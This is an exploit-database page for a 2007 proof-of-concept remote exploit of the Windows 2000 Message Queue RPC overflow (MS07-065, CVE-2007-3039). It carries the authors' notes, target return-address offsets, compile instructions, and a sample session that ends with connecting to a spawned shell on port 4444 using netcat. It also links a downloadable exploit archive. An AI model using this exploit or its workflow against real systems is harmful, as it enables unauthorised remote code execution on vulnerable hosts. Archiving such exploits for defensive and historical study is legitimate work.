Skip to content
cyberexploits
remotewindowstext

Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)

Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)

Published on 2007-12-21

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/windows/remote/4760.txt7eac4c3a
raw
******************************************************************************

********************** merry christmas Sysadmins *****************************

******************************************************************************

************** Microsoft Message Queue POC exploit ( MS07-065 ) **************

	Mario Ballano  - (mballano~gmail.com) - http://www.48bits.com

	Andres Tarasco - (atarasco~gmail.com) - http://www.tarasco.org

******************************************************************************



* Original Advisory: 

	http://www.zerodayinitiative.com/advisories/ZDI-07-076.html

* Microsoft Bulletin : 

	http://www.microsoft.com/technet/security/bulletin/ms07-065.mspx

* CVE Code: CVE-2007-3039

	http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3039

* Timeline:

    No naked news this time, just rum and whiskey

* Additional information:

	From Microsoft support http://support.microsoft.com/?id=178517 : RPC dynamic RPC ports for MQ 2101,2103,2105 

	HSC of course http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_msmq.html

	DaveŽs unmidl http://www.immunitysec.com/resources-freesoftware.shtml 

* How to compile: Call your favorite SetEnv.Cmd from microsoft SDK and then exec nmake.



* Note: There are several rpc ports to trigger the overflow. If you hit a system then

    looks like youŽll need to send the exploit twice  or specify another port (-p ) to exploit it again.



    There is a chance that offsets are invalid for windows 2000 server (only spanish win2k advanced server was tested)

	Adjust them if needed. 	





*Usage:



C:\Programación\MessageQueue>MessageQueue.exe

 --------------------------------------------------------------

 Microsoft MessageQueue local & remote RPC Exploit code

 Exploit code by Andres Tarasco & Mario Ballano

 Tested against Windows 2000 Advanced server SP4

 --------------------------------------------------------------



 Usage:   MessageQueue.exe -h hostname [-d Dnssuffix] [-n netbiosname] [-p port] [-t lang]



 Targets:

      0 (0x6bad469b) - Windows 2000 Advanced server English (default - untested)

      1 (0x6b9d469b) - Windows 2000 Advanced server Spanish

      2 (0x41414141) - Windows 2000 Advanced server crash



C:\Programación\\MessageQueue>MessageQueue.exe -h 192.168.1.39

 --------------------------------------------------------------

 Microsoft MessageQueue local & remote RPC Exploit code

 Exploit code by Andres Tarasco & Mario Ballano

 Tested against Windows 2000 Advanced server SP4

 --------------------------------------------------------------



[+] Binding to ncacn_ip_tcp:192.168.1.39

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[LRPC00000414.00000001]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QMsvc$testserver]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QmReplService]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncalrpc:[QMMgmtFacility$testserver]

[+] Found fdb3a030-065f-11d1-bb9b-00a024ea5525 version 1.0

[+] RPC binding string: ncacn_ip_tcp:192.168.1.39[1222]

[+] Using gathered netbios name: testserver

[+] Dynamic MessageQueue rpc port found (1222)

[+] Connecting to fdb3a030-065f-11d1-bb9b-00a024ea5525@ncacn_ip_tcp:192.168.1.39[1222]

[+] RpcBindingFromStringBinding success

[+] Trying to fingerprint target...

[+] Fqdn name obtained from netbios packet: testserver.local

[+] Remote OS Fingerprint (05.00)

[+] Remote Host identified as Windows 2000

[+] Sending POC Exploit code to QMCreateObjectInternal()

[+] Try to connect to remote host at port 4444 for a shell



C:\>nc 192.168.1.39 4444

Microsoft Windows 2000 [Versión 5.00.2195]

(C) Copyright 1985-2000 Microsoft Corp.



C:\WINNT\system32>



Download:

https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4760.zip (2007-MessageQueue.zip)



# milw0rm.com [2007-12-21]

View on GitHub